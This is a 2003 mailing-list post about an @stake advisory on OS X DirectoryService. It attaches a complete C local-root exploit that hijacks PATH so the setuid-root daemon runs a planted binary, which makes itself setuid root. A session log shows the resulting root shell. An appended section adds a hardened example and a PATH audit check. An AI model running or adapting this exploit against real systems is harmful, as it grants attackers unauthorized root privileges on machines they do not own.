Message-ID: <200304180515.h3I5FZRB028175@haackey.com>
From: neeko at haackey.com (Neeko Oni)
Subject: OS X DirectoryService DoS {@...ke adv:
Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once it has been crashed/killed_.
[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~#
>
> Neeko Oni wrote:
>
> >Ok, the PATH problem is self-explanatory (and has been exploited once
> >the DirectoryService process has crashed) but I've had some difficulty
> >reproducing the DoS attack claim. I've got a 10.2.4 machine sitting
> >right next to me, I believe it's a stock install, but DirectoryService
> >doesn't bind 625. DirectoryService doesn't bind any ports and
> >furthermore nothing binds 625 at all.
> >
> >Has anyone reproduced the DoS in that advisory?
>
> I also read the advisory and of the two MacOS machines that I am able
> to access (only one locally) I can confirm that on the machine that
> I don't have local access there was a daemon running on port 625 and
> as the advisory states I was able to reproduce the DoS attack. I'm
> not sure exactly which version of MacOS X that machine was running
> but the daemon did crash and refuse connection.
>
> On the machine that I know for a fact is 10.2.4 and have local access to,
> DirectoryService was setuid root and was running but there was no port
> 625 open. I haven't port scanned the machine to check other ports yet
> so I'm not ruling out the possibility it's running on a different port
> just yet.
>
> Has anyone else looked into this matter... ?
>
> -subversive
> --
> ______________________________________________
> http://www.linuxmail.org/
> Now with e-mail forwarding for only US$5.95/yr
>
> Powered by Outblaze
>
-------------- next part --------------
/*
OS X <= 10.2.4 DirectoryService local root PATH exploit
DirectoryService must be crashed prior to execution, per
@stake advisory. If you discover how to crash DirectoryService
e-mail me at neeko@...ckey.com [Neeko Oni]
[Copying and pasting code does not make you cool, no matter how many
dollars per hour you make. Sorry.]
--
Assuming DirectoryService has been crashed/killed, compile
this code as 'touch' (gcc osxds.c -o touch) and execute.
bash$ ./touch
*bunch of stuff here*
euid is root.
bash#
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

int
main(int argc, char **argv)
{
    char ORIGPATH[4096];   /* a real buffer; the original strcpy'd into an uninitialised pointer */
    const char *path;
    pid_t pid;

    if (argc < 2) {
        /* Second pass: ./touch has been made setuid root by the first pass,
         * so just drop into a root shell. */
        if (geteuid() == 0) {
            printf("euid is root.\n");
            setuid(0);
            execl("/bin/bash", "bash", NULL);
            perror("execl /bin/bash");
            exit(1);
        }

        /* First pass: save PATH and replace it with "." so that any "touch"
         * DirectoryService runs through sh resolves to this binary. */
        path = getenv("PATH");
        if (path == NULL)
            path = "";
        snprintf(ORIGPATH, sizeof ORIGPATH, "%s", path);
        printf("Original path: %s\n", ORIGPATH);
        setenv("PATH", ".", 1);
        printf("New path: %s\n", getenv("PATH"));

        printf("Executing DirectoryService with false PATH...\n");
        pid = fork();
        if (pid < 0) {
            perror("fork");
            exit(1);
        }
        if (pid == 0) {
            /* DirectoryService is setuid root; with PATH="." its shell
             * commands end up running ./touch (us, with arguments) as root. */
            execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
            _exit(1);   /* exec failed: never let the child fall through */
        }
        printf("Forked DirectoryService, pausing before shell exec...\n");
        sleep(3);
        printf("Cross your fingers.\n");
        setenv("PATH", ORIGPATH, 1);
        printf("Path restored: %s\n", getenv("PATH"));

        /* Re-exec ourselves with no arguments; if the setuid bit was
         * planted we come back in through the geteuid() == 0 branch above. */
        execl("./touch", "touch", NULL);
        perror("execl ./touch");
        exit(1);
    }

    /* Called with arguments: DirectoryService is running us as root in
     * place of the real touch(1). Make ./touch setuid root for the parent. */
    system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
    return 0;
}
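Added example, not part of the original post and not Apple's code: the exploit above works because a setuid-root program let /bin/sh resolve command names such as rm and touch through a PATH it inherited from an unprivileged caller. The exact command DirectoryService ran is not shown on this page, so remove_file_unsafe below is a hypothetical stand-in for that pattern, placed beside a hardened version (no shell, absolute binary path, explicit minimal environment) and a PATH audit check. hijack_demo builds a throwaway directory with a fake rm that only drops a marker file, then shows that the unsafe helper executes it and the safe one does not. All function names are this example's own.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Return 1 if any PATH component is relative (".", "", "lib/bin"), which is
 * the precondition for the hijack: a privileged program that lets sh resolve
 * "rm" or "touch" through such a PATH runs whatever the caller planted.
 * An unset PATH counts as unsafe, since sh then falls back to a built-in default. */
int path_has_relative_entry(const char *path)
{
    if (path == NULL)
        return 1;
    for (const char *p = path;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (colon == NULL)
            return 0;
        p = colon + 1;
    }
}

/* Vulnerable pattern (hypothetical stand-in for what the advisory describes):
 * the command name is resolved by /bin/sh through the inherited PATH. */
int remove_file_unsafe(const char *file)
{
    char cmd[1024];
    snprintf(cmd, sizeof cmd, "rm -f '%s'", file);
    return system(cmd);
}

/* Hardened pattern: no shell, absolute path to the binary, and an explicit
 * minimal environment so nothing inherited from the caller is consulted. */
int remove_file_safe(const char *file)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "rm", "-f", (char *)file, NULL };
        char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
        execve("/bin/rm", argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed demo: plant a fake "rm" in a temp dir (it only creates a marker
 * file), point PATH at that dir, and run both helpers on a victim file.
 * Returns 1 when the unsafe helper ran the fake rm (marker present, victim
 * untouched) and the safe helper did not (no marker, victim really removed);
 * 0 on any other outcome; -1 if setup failed. */
int hijack_demo(void)
{
    char dir[] = "/tmp/pathdemo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;
    char fake_rm[512], marker[512], victim[512];
    snprintf(fake_rm, sizeof fake_rm, "%s/rm", dir);
    snprintf(marker, sizeof marker, "%s/hijacked", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);

    FILE *f = fopen(fake_rm, "w");
    if (f == NULL)
        return -1;
    fprintf(f, "#!/bin/sh\n: > '%s'\n", marker);   /* fake rm: drop a marker, delete nothing */
    fclose(f);
    chmod(fake_rm, 0755);
    if ((f = fopen(victim, "w")) == NULL)
        return -1;
    fclose(f);

    setenv("PATH", dir, 1);   /* attacker-controlled PATH, like PATH="." in the exploit */

    remove_file_unsafe(victim);
    int unsafe_hijacked = access(marker, F_OK) == 0;
    int victim_survived = access(victim, F_OK) == 0;
    unlink(marker);

    remove_file_safe(victim);
    int safe_hijacked = access(marker, F_OK) == 0;
    int victim_removed = access(victim, F_OK) != 0;

    unlink(victim);
    unlink(fake_rm);
    rmdir(dir);
    return unsafe_hijacked && victim_survived && !safe_hijacked && victim_removed;
}

int main(void)
{
    const char *path = getenv("PATH");
    printf("current PATH %s: %s\n",
           path_has_relative_entry(path) ? "has a relative entry" : "is all absolute",
           path ? path : "(unset)");
    int r = hijack_demo();
    printf("hijack demo: %s\n",
           r == 1 ? "unsafe helper ran the planted rm, safe helper did not"
                  : r == 0 ? "unexpected result" : "setup failed");
    return r == 1 ? 0 : 1;
}
```

The audit function is the check to run in any setuid or root-spawned program before it calls system() or popen(); the more robust fix is the one remove_file_safe shows, which never consults PATH at all. Note that remove_file_unsafe also has the usual shell-quoting problem with file names containing a single quote, a second reason to avoid system() in privileged code.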